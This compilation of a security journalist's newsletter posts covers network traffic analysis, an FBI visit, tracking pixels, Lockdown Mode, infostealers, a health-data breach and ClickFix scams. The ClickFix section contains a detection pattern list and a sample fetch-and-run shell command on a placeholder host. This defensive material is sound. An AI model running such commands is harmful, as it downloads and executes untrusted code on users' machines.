You've no doubt heard this old proverb. Give someone a fish and you'll feed them for a day. Teach them how to fish and you'll feed them for a lifetime. The idea goes that someone in your life may teach you something you can use again and again, and that becomes a source of continuous reward.

This is the back-story of how I was taught to fish earlier in my cybersecurity journalism career.

Back in 2017, I was in contact with security researcher Will Strafach, who discovered that AccuWeather had embedded a piece of third-party code in its iPhone app that was collecting the device's location data, even if the iPhone's location setting was switched off.

This was an obscure finding, but a huge deal. It exposed that Apple devices weren't as private as users thought at the time, thanks to this loophole. It was also one of my first glimpses into the hidden world of third-party code and trackers embedded in apps and websites, and the voluminous amounts of data they collect while we use them.

In explaining how the code worked, Strafach introduced me to Burp Suite, network analysis software that lets you look at all of the network traffic flowing in and out of apps, websites, and devices by effectively wiretapping your own network connection (in other words, performing an adversary-in-the-middle attack on yourself).

This is helpful because what you see on your device's display isn't everything that happens when using an app or scrolling through a website. A lot is happening in the background, including the constant sending and receiving of data over the internet about your user interactions. Network analysis tools allow you to see exactly how an app or website loads, where it gets its content from, and where your data is sent.
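To make that concrete, here is a minimal Python sketch of the kind of tally a network analysis tool lets you do by eye: take the request URLs captured while using an app and group them by the host they were sent to. The URLs and the `example-weather.test` domain are made-up placeholders, not traffic from any real app, and this is an illustration rather than how Burp itself works.

```python
from collections import Counter
from urllib.parse import urlsplit

# Hypothetical request URLs, as you might copy them out of a proxy's history.
captured_urls = [
    "https://api.example-weather.test/v1/forecast?zip=10001",
    "https://api.example-weather.test/v1/alerts",
    "https://collect.example-tracker.test/event?lat=40.78&lon=-73.97",
    "https://cdn.example-ads.test/banner.js",
    "https://collect.example-tracker.test/event?screen=home",
]


def hosts_contacted(urls):
    """Count how many requests went to each hostname."""
    return Counter(urlsplit(url).hostname for url in urls)


def third_party_hosts(urls, first_party):
    """Return hosts that are neither the app's own domain nor a subdomain of it."""
    hosts = hosts_contacted(urls)
    return sorted(
        host
        for host in hosts
        if host != first_party and not host.endswith("." + first_party)
    )


if __name__ == "__main__":
    # Print each host with its request count, busiest first.
    for host, count in hosts_contacted(captured_urls).most_common():
        print(f"{count:>3}  {host}")
    # Print only the hosts that do not belong to the (assumed) app owner.
    print(third_party_hosts(captured_urls, "example-weather.test"))
```

In this made-up capture, the interesting part is the hosts that are left over once you set aside the app's own domain, since those are where your data is going besides the app maker.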

Learning all of this was eye-opening. It was incredible to see this network traffic flow across my screen in a relatively easy-to-parse way as I used the app on my phone in real-time. It was magical.

But once you look behind the curtain and see what's actually happening, it can be both revealing and unsettling, knowing that there is this constant undercurrent of data that flows from your devices into the databases of big corporations.

I got hooked on Burp, learning to tinker with it more and more. In recent years, some of the big web browser makers have matched some of Burp's basic network analysis functionality, making these tools far more ubiquitous and available for anyone to use.

But, for me, learning to use Burp has been one of the most helpful things in my journalism career. It has helped me to:

- identify and expose countless spyware operations,

- find a major bug in a COVID-19 vaccination app used by several U.S. states,

- discover, report, and get fixed a data spill involving LabCorp patient data,

- earn a CVE for my reporting on spyware that was exposing victims' data,

- find that USPS was sharing the home addresses of logged-in users with advertising giants like Meta, LinkedIn, and Snap,

- and, during 2025 alone, uncover and report several security and privacy flaws in popular apps, including viral call recording app Neon, event planning startup Partiful, and dating app Raw.

Suffice to say, it's been highly useful, and quite honestly it's been fun to learn along the way.

Almost a decade later, I sat down with a colleague at TechCrunch to teach them how to use Burp Suite to test one of those bizarre AI companion toys for suspected malfeasance (we found none). But within a few minutes, they'd already uncovered something buried in the Grok AI site, showing that it was able to pull out its hardcoded prompts that guide its responses.

It was really amazing to see them light up in equal parts excitement and horror using Burp Suite for the first time. I'm glad I was able to pass along some of these skills, and — just as Strafach had with me — teach them to fish.

Frankly, I think this is something that anyone can learn if you're interested, and the on-ramp to understanding is relatively easy. You can quickly learn how apps and websites really work by seeing the data flow in and out. You see how they function, what data they're sharing, and how frequently they're sharing your data, and with whom. And, in an age of vibe-coded apps that are slopped together by AI with minimal (or no) thought to security, Burp lets you perform basic app and website testing before you trust them with your own data.

It can be an enlightening, if not terrifying window into where your private data goes and who can ultimately access it.

Not only that, using Burp is a great way to learn how things work on the internet, and it can be a foot in the door for further security research. I'm a firm believer that tech (and cybersecurity) journalists should try to learn technical skills throughout their careers. It's not an imperative, but building something, or breaking things, will help. Burp Suite, especially, is something anyone can learn to use, as it's free to download and you can tinker with its basic features at no cost.

In this incredibly deep-dive article (it's worth it!), I'll explain how to get started with Burp and similar browser-based tools. We'll talk about how APIs work, how to understand network requests, and I'll show you how to work with Burp Suite's most common tools. Plus, I'll walk you through a couple of examples of how I found some security flaws and exposures that I wrote up for TechCrunch.

Please consider a subscription to access this article! It helps to support long-reads like this, and gives you the tools you can use and how to use them.

It was August 12, 2020, the height of the COVID-19 pandemic, and a blisteringly hot day in New York City. I was confined to my home office on the Upper West Side during the months-long lockdown, while my partner was out of state at the time for a few days. I was hungry after a busy morning of video calls, so I ordered food online from my local sandwich shop. I didn't think twice when the doorbell rang soon after.

I opened the door and saw two FBI agents standing in my doorway, sweaty and out of breath from the five-floor walk-up. My heart dropped. Shaken and slightly panicked, a million thoughts flooded through my head. But the first probably shouldn't have been: "Well, shit. This isn't my lunch."

One of the agents identified himself as Will McKeen from the FBI's New York field office, and flashed me his nondescript-looking badge. Taken aback, and admittedly quite hungry, I asked McKeen what this visit was about. He wanted to ask me questions about my prior contact with the Mexican government, he said. My mind immediately jumped to a story I had written a year or so earlier about a hack at one of Mexico's embassies.

Since this was evidently a work-related request and there was no reason for me to speak with them, I declined, referred them to my employer's general counsel, and shut the door.

As I wrote at the time in 2019, I had seen a post on Twitter from a hacker who published links to thousands of documents, including visas and diplomatic passports. Seeing this as a possible story, I contacted the hacker to ask more about the data they had published and how they had taken it.

The hacker told me that they had found a vulnerable server belonging to a Mexican embassy in Guatemala and downloaded its contents. The hacker said they tried to report the issue but were ignored. It was definitely a story, I thought. I reached out to the Mexican government to provide them an opportunity to comment. A representative said Mexico took the matter "very seriously," we published our article, and I moved on.

As a journalist of almost two decades, it's not unusual for me to talk to the authorities; it's part of the job when reporting a story or when giving someone the right of reply. But there are some things a journalist will not share, such as the identity of a confidential source. I've also faced plenty of veiled and spurious legal threats in the past for my work, from those who view reporting on their own embarrassing data breaches or security lapses as bad for their reputations.

But seeing feds on my doorstep ready to ask me questions about a story I had published was a new one for me.

~this week in security~ is my weekly cybersecurity newsletter supported by readers like you. Please consider signing up for a paying subscription starting at $10/month for exclusive articles, analysis, and more.

Closing the door was not the end of the matter. Two weeks later, McKeen emailed me asking to set up time to interview me about the story. Per his email signature, McKeen was a supervisory special agent in the FBI's Cyber Division, specifically the Financial Cyber Crimes Task Force.

What I didn't know at the time was that this home visit was the beginning of a protracted year-long effort by the feds to try to get me to answer Mexico's questions about things I hadn't published in the story. Mexico had formally requested the U.S. government's help in seeking answers from me, since I was within the FBI's reach and not within Mexico's.

The visit also sparked my own multi-year effort to try to pry information out of the FBI to explain why it had come to my house to begin with.

Was coming to my home an effort by the Trump administration's FBI to intimidate a reporter? Or an FBI agent acting on his own authority to coax confidential information from a journalist about a source? Or something altogether more sinister? Was I under investigation by the U.S., Mexico, or both, for publishing a story to the embarrassment of a foreign government?



My employer stood its ground. In July 2021, lawyers at my company told the government that it was "unwilling" to share information with U.S. prosecutors beyond what we had already published in my story.

The message was simple: The Justice Department cannot compel me to turn over my notes or anything else outside of what we had published, as this was within the legally protected scope of newsgathering. In other words, the FBI would need to first convince a judge, but to do that would require proof of... well, something. And neither the FBI nor the Mexican government has accused me of any wrongdoing.

More than five years on, the FBI will not say for what reasons it sought information from me to begin with. After I filed a Freedom of Information Act (FOIA) request and a subsequent appeal with the Justice Department, the FBI has refused to disclose why agents came to my house or if I was (or still am) under investigation for my work. As such, I still can't travel to Mexico, or anywhere that relies on its airspace, unsure as to what view authorities there might take if I ever cross into its territory.

The FBI initially denied my FOIA in full, citing the 7(E) exemption, claiming the release would "disclose techniques, procedures, or guidelines for law enforcement investigations or prosecutions and risk circumvention of the law."

My employer appealed, arguing that there was no secret about the FBI "seeing a journalist’s byline on a publicly reported story and contacting the journalist and his company about it." We also argued that the FBI even withheld the letter that my employer had already sent them, declining to share information outside of what we had already published.

In response to our appeal, the FBI denied the request again, citing the same 7(E) exemption, but this time saying that the "material you requested is located in an investigative file which is exempt from disclosure."

This is my brick wall. I've taken the FOIA as far as I can. It's unrealistic to expect the Trump administration will act in good faith by releasing the files, and I don't have the resources to sue.

As you'd expect, I'm left with questions about the case. The one person who would know is McKeen, who has since moved on from the FBI. I reached out to him at Yahoo, my former employer and now his (small world!) to ask him about the case. Aside from an automated out-of-office response, I didn't hear back.

Having the feds turn up at your door isn't anything close to the use-of-force and downright aggression by some federal agencies in the United States today. But it was never right to begin with. Telling my partner when she came home the next day that federal agents had been to the house was not a conversation I ever want to have again. This went on all the while living as a U.S. permanent resident, adding extra fears that the government could retaliate against me by pulling my work permits and upending my life here. I was also concerned that this would loom over any prospects of me one day becoming a citizen. (It didn't.)

Press freedoms don't always disappear overnight; they're chipped away at over time. And if they're not defended, the government can continue to act with impunity against constitutionally protected reporting.

Trump continues to intimidate journalists. Just recently, the FBI raided the home of The Washington Post's Hannah Natanson as part of an investigation into alleged leaks by a government contractor. Critics decried the raid as unprecedented and a brazen attack on press freedoms, not least because Natanson isn't the subject of the government's investigation. (The judge is also pissed off that prosecutors effectively misled him into approving the warrant to search Natanson's home by not first flagging a federal law that was meant to protect journalists from these kinds of raids.)

Worse, protections for journalists have actually taken a huge step back.

In December 2020 and in an entirely unrelated case, Trump's Justice Department secretly obtained court orders demanding that several phone and email companies turn over records belonging to reporters at CNN, The New York Times, and The Washington Post in an effort to identify the source of government leaks to journalists. Biden's Justice Department freaked out when it took office months later and found out this was happening, subsequently told the reporters, and moved to change departmental policy to stop prosecutors from doing this.

In modifying its own rules, the Justice Department effectively swore a pinky-promise that it would no longer demand access to journalists' notes and newsgathering records (like phone and email logs) so long as these were within the scope of their work.

This policy change is what ultimately allowed my employer to rebuff the FBI's efforts to interview me.

But the policy change was never codified into federal law. The draft bill of the PRESS Act drew rare unanimous, bipartisan support in the U.S. House of Representatives. Literally everyone agreed press freedoms are a good thing! But the bill ultimately stalled in the Senate, thanks to a single fuckwit lawmaker, and that was the end of it. Now we're back to square one, because the Trump administration (take two) reversed Biden's policy, promptly allowing the Justice Department to start secretly snooping on journalists again.

Congress could be doing a lot right now, but allowing journalists to do their jobs is never not going to be important.

With more smaller news outlets and independent journalists than ever, and with regular Americans increasingly documenting the abuses of the Trump administration in the streets, it's all the more critical to protect the rights of the free press.

Thank you so much for reading ~this week in security~! Please reach out with any feedback, questions, or comments about this article: [email protected].

Excellent reporting by BBC's Thomas Germain in his latest Keeping Tabs column:

"TikTok collects sensitive and potentially embarrassing information about you even if you've never used the app. [...] The issue centres around major changes to TikTok's "pixel", a tracking tool that companies use to monitor your online behaviour.

When it's shoe store data, the information might be innocuous. But I've reported on TikTok's data collection for years and pixels can collect extremely personal information."

These online trackers, called pixels, are tiny, near-invisible images that are the size of a dot on the display of your device. Even though you can't see them, pixels are packed with tracking code. When you open a webpage that loads a TikTok pixel in the background, the pixel collects information about you, regardless of whether you use the app or have a TikTok account.

As Germain noted, TikTok pixels have been around for years, allowing them to proliferate all over the web. But now under U.S. ownership and with an updated privacy policy as of January, these pixels can collect far more data than before.

Companies like TikTok incentivize website owners to place pixels on their websites under the guise of helping businesses grow, such as providing insights about how their users interact with their content, what they click on, and if it leads to someone making a purchase. In return, TikTok gets to see the online browsing habits of anyone who visits a website containing its tracking pixels, which allows it to track people as they browse the web.

In reality, loading a webpage with a pixel tracker is akin to letting a tech giant watch over your shoulder as you read, scroll, tap, or submit any private or sensitive information to the page.
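As a rough illustration of why a tiny image can reveal so much, here is a minimal Python sketch of a pixel request. It assumes a tracker whose image URL carries details about the page in its query string. The endpoint, the parameter names (`url`, `ev`, `vid`), and the clinic address are all hypothetical, and real pixels typically gather more than this through scripts and cookies.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

# Hypothetical tracker endpoint and parameter names, for illustration only.
PIXEL_ENDPOINT = "https://pixel.example-tracker.test/p.gif"


def build_pixel_url(page_url, event, visitor_id):
    """Build the image URL a browser would request when the page loads."""
    params = {"url": page_url, "ev": event, "vid": visitor_id}
    return PIXEL_ENDPOINT + "?" + urlencode(params)


def what_the_tracker_sees(pixel_url):
    """Parse the query string back out, as the receiving server could."""
    query = parse_qs(urlsplit(pixel_url).query)
    return {key: values[0] for key, values in query.items()}


if __name__ == "__main__":
    pixel_url = build_pixel_url(
        "https://clinic.example.test/fertility-test/checkout",
        "AddToCart",
        "abc123",
    )
    print(pixel_url)
    print(what_the_tracker_sees(pixel_url))
```

The point of the sketch is that the page address alone can be sensitive: the tracker never needs to see a form field to learn that a visitor was looking at a fertility test.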

As such, there can be unintended consequences of using pixels. Germain found in his tests that several medical, mental health, and other healthcare companies shared information about their website visitors with TikTok, including which pages they viewed, such as pages about fertility tests or finding a crisis counsellor.

TikTok uses this information to target people more accurately with advertising. But critics say amassing this vast amount of data exposes people to surveillance, or a greater risk of hacks and security lapses, which have happened to ad tech giants in the past.

In fact, it's not just TikTok. Other social media and advertising giants, including Google, Meta (which owns Facebook and Instagram), LinkedIn, X (formerly Twitter), and companies like Mixpanel, rely on pixels to collect people's information as they browse the web, even though they say that website owners are not allowed to collect sensitive data, such as health information.

That said, it still happens, and using pixels for data collection across sensitive industries has caught out some big players in the past. Several healthcare and telehealth companies, and health insurance giants, have in recent years fallen foul of federal privacy laws by sharing, in some cases, millions of users' private information with ad giants. In 2024, I exclusively reported for TechCrunch that the website of the U.S. Postal Service was also sharing the private home addresses of logged-in users with Meta, LinkedIn, and Snap. USPS curbed the practice after I alerted the postal service to the security lapse.

There is good news! An ad-blocker is your best defense against invasive online tracking, like website pixels, because it prevents the tracking code from loading in your browser to begin with. The good folks at nonprofit news site The Markup in February updated their web privacy inspector tool Blacklight, now allowing anyone to check if a website has a hidden TikTok tracker before visiting.
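The blocking idea itself is simple enough to sketch in a few lines of Python. This is an assumption-laden toy, not how any particular ad-blocker is implemented: the `BLOCKED_DOMAINS` list is hypothetical, and real blockers rely on much larger, maintained filter lists with richer rules.

```python
from urllib.parse import urlsplit

# Hypothetical blocklist; real ad-blockers use far larger, maintained lists.
BLOCKED_DOMAINS = {"example-tracker.test", "example-ads.test"}


def is_blocked(request_url, blocked=BLOCKED_DOMAINS):
    """Return True if the request's host, or any parent domain, is listed."""
    host = urlsplit(request_url).hostname or ""
    parts = host.split(".")
    # For a.b.c this checks "a.b.c", then "b.c", then "c".
    return any(".".join(parts[i:]) in blocked for i in range(len(parts)))


if __name__ == "__main__":
    for url in (
        "https://pixel.example-tracker.test/p.gif",
        "https://clinic.example.test/fertility-test",
    ):
        verdict = "blocked" if is_blocked(url) else "allowed"
        print(f"{verdict}: {url}")
```

Because the request is refused before it is ever sent, the tracker in this sketch never receives the page address or anything else about the visit.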

As Germain's column notes, the solution is ultimately demanding better privacy laws, since this is a problem created and permitted by the ad tech industry. But since hell isn't likely to freeze over any time soon, starving the ad giants of your data is for now one of the better remedies.

An often-overlooked security feature in Apple devices that makes it more difficult for cyberattacks to compromise iPhones, iPads, Macs, and Watches is getting its moment in the spotlight after proving so far effective at blocking federal agents from accessing the iPhone of a Washington Post reporter.

In a court document on January 30, U.S. prosecutors said that the FBI was unable to access the data on the phone of journalist Hannah Natanson, some two weeks after her phone was seized, reports 404 Media ($). Marcy Wheeler, who writes at emptywheel, also has an excellent post worth reading.

According to prosecutors, the FBI was blocked thanks to Lockdown Mode, which Apple bills as an "extreme protection" to defend users who think they are being targeted by cyberattacks, like government spyware, or — in this case — a mobile forensics device designed to unlock Natanson's phone.

This disclosure is the first known admission that Apple's Lockdown Mode can defeat some of the mobile unlocking tools used by the FBI. Many of the same commercial phone hacking tools are also used by other federal agencies, such as ICE, local police departments across the U.S., and globally, sometimes against protesters.

The raid on Natanson's home and devices is mired in controversy. Natanson has not been accused of a crime, nor is she the subject of the FBI's investigation into the government contractor who allegedly leaked classified information to her. Natanson's extensive reporting over the past year has cited more than a thousand government workers, many of whom have been critical of the Trump administration in the face of widespread cuts to the federal workforce. This reporting likely made her the target of an administration that is already bending the rules of the Fourth Amendment to go after its critics. As a journalist, Natanson is also broadly shielded under U.S. federal law from having her phone and devices raided by the government.

All to say, if this kind of seizure can happen to Natanson, it can happen to others.

It is all the more important that independent journalists and citizens alike, who lawfully exercise their First Amendment rights by documenting and filming abuses on their phones, consider taking additional precautions to protect themselves from an increasingly unpredictable government.

That's where Lockdown Mode can help to play a part.

Lockdown Mode, which rolled out in iOS 16 in 2022, works by broadly switching off certain functions on your Apple devices, while limiting others, to block off the common routes that cyberattacks use to break into these devices. In doing so, Apple makes it significantly more difficult for malicious hackers to hack into your device, or for sensitive data, such as your location, to leave it.

In the case of Natanson's phone, a specific Lockdown Mode feature prevented access to her phone's data. In Apple's documentation, Lockdown Mode blocks Apple devices from allowing "direct connections" from unknown devices, including plug-in accessories (or mobile forensic devices), unless the device has been unlocked.

I've used Lockdown Mode since its launch, and after a relatively short learning curve, I found it doesn't get in the way of my everyday working life. Aside from the unseen protections, like disallowing direct connections from external accessories and devices, there are some more noticeable usability tradeoffs with Lockdown Mode that you get used to fairly quickly. A common hurdle is having to take an extra step to manually copy links from my messages app, then paste them into my browser, rather than tapping the link preview directly. This is a simple but effective way of reducing the success of malicious attacks, like spyware sent by text message, and as a result makes it vastly more difficult for hackers or governments to steal my phone's data.

The Electronic Frontier Foundation has a great guide on what Lockdown Mode is, how it works, what it does, and what features it helps to limit for your protection.

On its own, Lockdown Mode is not a panacea, and there are plenty of other security and privacy precautions to think about as well, depending on your own personal threat model. In Natanson's case, the feds were able to get access to her cloud-stored documents and her Signal texts through her linked work laptop, which was unlocked by her fingerprint.

I have some additional thoughts for "Astonishing admins" subscribers after the fold. This includes additional security steps you can take to protect yourself from real-world adversaries and why they work, such as if you're faced with a police or law enforcement situation. I also have some more about what this means for Android device users, and other resources you can consider to strengthen your mobile devices.

Security researchers and journalists are no strangers to legal threats, and increasingly, threats from criminals. Some may see threats as an occupational hazard of working in cybersecurity, oftentimes in response to revealing or disclosing a vulnerability, data lapse, or cyberattack, much to the chagrin of someone else.

But while there are periodic reports of threats made against security researchers and journalists, there are also countless cases where threats have caused a chilling effect that we may never hear about.

As a reporter for almost two decades, I know all too well the threats that security researchers and journalists encounter. I've also experienced threats and intimidation of my own, such as the FBI turning up at my house after I reported a story, and being subject to hostility from an overseas government for disclosing multiple security lapses, all the way to countless spurious (and rejected) legal threats and demands.

But these still pale in comparison to the threats others have had to endure, including cases where researchers and journalists have been threatened with hefty sanctions if they publish, and instances where some have been actively sued. In other noteworthy reports from further afield, good-faith researchers and journalists have had to fight criminal charges or otherwise been prevented from doing their jobs.

Still, there hasn't been a wider exploration of the legal and criminal threats faced by both security researchers and journalists, many of whom do similar work, nor has it been clear what effect threats have on publishing and reporting.

I teamed up with Dissent Doe, the pseudonymous journalist at DataBreaches.net, one of the finest journalists in the data breach reporting space and someone I've known for years. Dissent Doe, too, has received numerous threats for their research and reporting.

We both wanted to explore more about what effect threats have on security researchers and journalists at large, so we got to work.

We surveyed over a hundred security researchers and journalists who cover a mix of cybercrime investigations, malware research, and data breaches about the legal and criminal threats they've experienced and how those threats affected their work. To our knowledge, this is the first survey that aims to understand how often security researchers and journalists are legally threatened or threatened by criminals, and to understand how that affects the publication or withdrawal of research or journalism.

While the survey size was relatively small, and we note that we heard from more researchers than journalists, the responses were pretty interesting.

Here are some of the takeaways:

Most security researchers and journalists have received a threat for their work

Three-quarters of security researchers and journalists who responded said they have faced a threat for doing their work, leaving a quarter of respondents saying they have never received one. We know anecdotally that researchers and journalists experience threats, but to see it quantified to this degree shows threats are an inherent risk of this field.

We also asked how concerned respondents were about the threats they received, and asked folks to mark on a scale their perceived severity. These scores are subjective, of course, but we wanted to understand how concerned they felt and how this affected their decision to retract or change their findings, if at all.

We found that concern scores in the lower-half (ranked 1-5) were mostly associated with the decision not to retract or remove, while higher scores (ranked 6-10) led to a mix of people retracting and others not. Of the people who were most concerned, most said that they found the threats to be credible.

Legal threats are common for all, but journalists get more criminal threats

Half of all respondents have received at least one legal threat, ranging from indirect threats, like messages, to formal letters from law firms, all the way to federal or police investigations.

While researchers and journalists are equally likely to receive a legal threat, we found that journalists were more likely to be threatened by criminals, including threats that have occurred in the real world.

This could be in part because we had a smaller sample of journalists, but we also found journalists were far more likely to have their name attached to their work, which may increase their odds of having a threat directed at them.

In the face of threats, most researchers and journalists stood their ground

In spite of receiving threats, the majority of researchers and journalists did not retract or change their research or reporting, even in some cases after receiving death threats.

We heard examples of specific threats, including violence and intimidation, but we decided not to publish them so as not to encourage further threats. But despite facing threats from criminals, the significant majority of journalists and researchers who were threatened, even with violence, continued with their research or reporting.

This was an interesting, and a positive overall response. While some threats were not considered credible, plenty were, and based on some of the comments we read, many researchers and journalists were simply determined not to capitulate.

But we also note that some researchers and journalists were put in an impossible situation. For example, one respondent reported that their news outlet decided to retract so they would not have to reveal the identity of a source in court.

We hope to keep exploring the threats that face security researchers and journalists, and hope others will also consider future research to help refine our understanding as to why and under what circumstances research or journalism is retracted or removed. Legal and criminal threats can have chilling effects, and more research is needed to determine what support researchers and journalists need to prevent, assess, and respond to them.

You can check out DataBreaches.net for the full findings, as well as a downloadable PDF.

On Friday, security researcher Jeremiah Fowler reported finding an unprotected database storing 149 million sets of people's usernames and passwords. It's not clear why the database was open to the internet without a password of its own, but anyone could've accessed the millions of credentials inside if they, like Fowler, knew where to look.

Fowler couldn't find the database's owner, so he reported the security lapse to the web hosting provider, which took the data offline soon after.

Lily Hay Newman with exclusive details for Wired ($):

"In addition to email and social media logins for a number of platforms, Fowler also observed credentials for government systems from multiple countries as well as consumer banking and credit card logins and media streaming platforms. Fowler suspects that the database had been assembled by infostealing malware that infects devices and then uses techniques like keylogging to record information that victims type into websites."

This isn't the first time that we've seen a massive database of credentials exposed to the web, like the recent now-infamous report of 16 billion passwords floating around. While they seem sizable, these databases only reflect a slice of this booming underground economy of stolen credentials that powers much of cybercrime today. And it's thanks in large part to infostealing malware, which helps to fuel the trade of credentials on criminal forums and marketplaces.

Infostealing malware is an increasingly common and low-lift way for hackers to steal reams of passwords from your computer, because the victim does much of the hard work.

Infostealers can be planted in a number of places, from malicious ads in search results to spoof error messages that prompt victims into entering a command into their computer's terminal. Password-stealing malware is also commonly found in apps downloaded from the internet, affecting Windows and Mac users. The result is usually a victim unwittingly installing the malware app on their own computer, granting the hackers instant and deep access to their private data, including the passwords saved in their web browsers.

~this week in security~ is my weekly cybersecurity newsletter and blog supported by readers like you. Please consider signing up for a paying subscription starting at $10/month for exclusive articles, analysis and more.

Credential theft is big business for cybercriminals and remains a top way for hackers to target their victims. But unless you're personally minted with crypto, there's a greater chance that the hackers are actually after your corporate credentials, which they're hoping you saved in your browser on the occasions you work from home.

Stealing these credentials can make it really easy for hackers to break into corporations with just the employee's stolen username and password. Why use a fancy zero-day exploit when a hacker can just log in as if they are an employee? If the attacker is really lucky, they won't have to jump through an added hurdle of two-factor authentication.

Some of the biggest and most consequential breaches in recent years have been linked to password misuse coupled with lacking security protections. A 2024 breach at Change Healthcare allowed hackers to steal the private health data of most Americans, thanks to a stolen password for an internal account that didn't have two-factor enabled. 23andMe met a similar fate, after hackers used stolen credentials to break into thousands of user accounts, then exploited a bug in 23andMe's ancestry matching systems to scrape the sensitive health and genetic data belonging to millions of users.

Databases like the one Fowler discovered are the tip of the iceberg of data stolen by infostealers, revealing only a small window into the massive world of credential theft.

The next time you see a headline about a breach involving millions or hundreds of millions of passwords (or more!), there is a good chance it may not be a singular breach but a collection of many. It's worth remembering why hackers create huge databases of passwords to begin with, and the risks they pose to people and companies alike.

Thank you so much for reading and subscribing to this week in security! I hope you found this article helpful. If you like it, please share a link on your social media. Please reach out with any feedback, questions, or comments about this article: [email protected].

A data breach at a major U.S. health technology company, which handles billions of patient transactions annually, is coming to light almost a year after hackers first broke into the company's systems.

TriZetto is a health tech giant owned by multinational IT conglomerate Cognizant (yes, that Cognizant), which healthcare providers, doctors' offices, and hospitals use to verify a person's health insurance benefits. The company says it serves 200 million people across 875,000 healthcare providers throughout the United States, and handles more than four billion healthcare-related payments each year.

As such, TriZetto touches a ton of patient data.

Complicating things, TriZetto has said very little about its data breach so far, including how the hack happened and what circumstances led to its discovery. TriZetto makes no mention on its website that it was hacked.

When reached by email, William Abelson, a spokesperson for TriZetto's parent company Cognizant, reiterated that the company "launched an investigation, took steps to mitigate the issue, and eliminated the threat to the environment," but did not answer specific questions from me about why the breach wasn't detected sooner.

On March 6, TriZetto confirmed that 3.4 million people had sensitive personal and health data stolen in the breach.

With downstream healthcare providers notifying affected patients about the breach, this is what you should know so far.

On October 2, 2025, TriZetto discovered a web portal used by some of its healthcare provider customers had been hacked. The company expelled the hackers from its network on the same day. TriZetto later confirmed that it hired incident response firm Mandiant to investigate, which determined the hackers had access to "eligibility transaction reports" on the company's servers as far back as November 2024.

TriZetto said these reports contained patients' protected health information, and were used for verifying the eligibility of people seeking access to health insurance.

According to a data breach notice sent to one provider, the hackers compromised patients' names and their date of birth, their Social Security number, health insurance member number (which may be a Medicare identifier) and the name of their health insurer, records about the patient's dependents, and reams of other demographic and health insurance-related information.

TriZetto said it had no evidence that the hackers downloaded any data, but also didn't say if it had the technical means (such as log files) to know for sure.

Two months later on December 9, TriZetto began notifying its affected healthcare provider customers whose patients had information accessed in the breach.

One of the biggest providers is OCHIN, a nonprofit consultancy firm that provides healthcare technology to some 300 rural and community care providers across the United States. This includes hosting and providing access to MyChart electronic health records systems licensed from tech giant Epic, which patients use to log in and access their diagnoses, prescriptions, and medical notes. OCHIN alone serves at least 7.6 million patients through this offering, according to its website.

OCHIN said that in the days after it was notified, TriZetto shared several lists of affected patients, suggesting TriZetto had at least some indication of which patients had data compromised.

From there, OCHIN — and other healthcare providers and their affiliates who rely on TriZetto — began notifying their downstream customers and partners, and ultimately sending notices to the patients they serve.

In OCHIN's case, this includes Planned Parenthood of Northern California, the Mission Neighborhood Health Center, and many other healthcare providers across the United States, whose data breach notices are starting to roll in.

Not every healthcare provider was affected, nor every patient’s information accessed, TriZetto said. But it remains a mystery how the hackers got into TriZetto's systems to begin with, and the company's spokesperson still would not say.

Updated on March 6, 2026 with new information about TriZetto's breach.

Thank you so much for reading and subscribing to this week in security! I really hope you found this article helpful. If you like it, please share a link on your social media. Please reach out with any feedback, questions, or comments about this article: [email protected].

A raft of devious malware campaigns that trick unsuspecting victims into essentially hacking themselves have flooded the internet of late.

These campaigns are commonly called ClickFix attacks, named as such because victims tend to get hacked after searching the web looking for quick fixes to tech issues, but instead get duped into running malicious instructions on their computer. These attacks affect Windows, Mac, and mobile users, and are effective at skirting cybersecurity defenses and common endpoint protections.

Over the past year, ClickFix attacks have spread across the internet, become more advanced, and are showing up in more places than ever before, making these attacks a major threat facing both consumers and businesses.

Picture this. You're browsing the web, and then out of nowhere, clicking on something like an "I am a human" CAPTCHA form appears to cause your computer to freeze. Your screen fills with an error message, saying your computer has crashed, or that your browser needs to update before you can continue. You may be prompted to hit a few key combinations on your keyboard, like opening the Run command or your computer's terminal, and the issue should resolve. All of this might seem fine on the face of it, and should only take a matter of seconds. After all, it's not like it's asking you to download and install anything… right?

But that's exactly what it's trying to get you to do. Pasting malicious code into your computer downloads and runs malware in a flash. Within seconds, the malware has already stolen some of your most sensitive information, including your saved passwords. And many victims will have absolutely no idea. For those who do, most are left with no option but to wipe their computer clean and restore their files from a backup.
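To make that concrete, here is a rough sketch in Python of the kind of sanity check you could run on a command before pasting it into a terminal or the Run box. The pattern list and the `looks_risky` function are illustrative assumptions, not a real detection tool, and the lures change constantly, so a clean result guarantees nothing.

```python
import re

# Illustrative patterns only (an assumption, not a complete or authoritative
# list): tools and idioms often used to download and run code in one step.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\bpowershell(\.exe)?\b", re.IGNORECASE),
    re.compile(r"\bmshta(\.exe)?\b", re.IGNORECASE),
    re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b", re.IGNORECASE),
    re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE),
    re.compile(r"\bbase64\s+(-d|--decode)\b", re.IGNORECASE),
]


def looks_risky(pasted_text: str) -> list[str]:
    """Return the patterns that match the text someone is asking you to run."""
    return [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(pasted_text)]


if __name__ == "__main__":
    # example.invalid is a reserved placeholder domain, not a real lure.
    command = "curl -s https://example.invalid/fix.sh | sh"
    hits = looks_risky(command)
    if hits:
        print("Do not run this. Matched:", hits)
    else:
        print("No known-bad pattern matched (which proves nothing).")
```

The safer habit is simpler than any script: if a web page asks you to paste something into your terminal or Run box, don't.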

Not so long ago, I saw someone's computer screen in the real world taken over by one of these ClickFix attacks. To the untrained eye, an attack can look pretty convincing, almost like you've been hit by ransomware or some other kind of file-locking malware, with no discernible escape.

Oftentimes, though — and in the case I witnessed — this attack can be resolved simply by hitting the Escape key (or Alt + F4) on your keyboard. This usually breaks out of the full-screen window mode, revealing what was actually a spoofed web page serving a pretty convincing error message and a hacking lure.

But not everyone knows that! Instead, the stress and panic of seeing a false error like this might just be enough to tip someone into falling for it. Maybe that person had a rough day at work? Maybe their boss is being an asshole and frankly they just don't have the time and energy today for any more nonsense? Even then, some folks just don't expect to see an attack this way, or wouldn't know that this kind of attack exists to begin with.

Making matters worse, ClickFix attacks are becoming increasingly deceptive and rapidly adapt to evade detection, leading to wave after wave of variants that use similar but novel techniques to trick victims into running malicious code on their own computers.

